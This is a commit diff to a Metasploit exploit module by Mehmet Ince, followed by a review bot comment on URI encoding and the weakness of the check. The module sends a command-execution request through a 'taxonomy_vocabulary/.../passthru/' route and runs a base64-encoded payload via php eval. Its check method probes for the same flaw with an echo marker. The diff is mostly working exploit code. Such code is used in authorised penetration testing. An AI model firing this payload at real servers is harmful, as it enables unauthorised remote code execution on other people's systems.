Use vars_get in send_request_cgi

Mehmet Ince
2016-07-19 20:12:14 +03:00
parent ec2f8fcc71
commit 9c8e351ba8
@@ -53,10 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
def check
r = rand_text_alpha(8 + rand(4))
url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
}
)
if res && res.body =~ /#{r}/
return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
random = rand_text_alpha(1 + rand(2))
url = normalize_uri(target_uri.path,
"?q=taxonomy_vocabulary/",
random ,
"/passthru/",
Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
)
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
send_request_cgi(
'method' => 'GET',
'uri' => url
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
}
)
end
end
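Review bot: In both `check` and `exploit` the new `'vars_get'` hash leaves URI encoding of the `q` value to `send_request_cgi`, and nothing in the code records that this is intentional. The removed lines encoded by hand (`echo%20` and `Rex::Text.uri_encode`), so a comment above each hash such as `# vars_get values are URI-encoded by send_request_cgi by default; do not pre-encode` would stop a later edit from encoding twice. Separately, in `check` the marker `r` is itself part of the request, so a page that only reflects the query string would also satisfy `res.body =~ /#{r}/`; a short comment that `Appears` is weak evidence would help whoever triages the result. The body of `check` continues outside the first hunk.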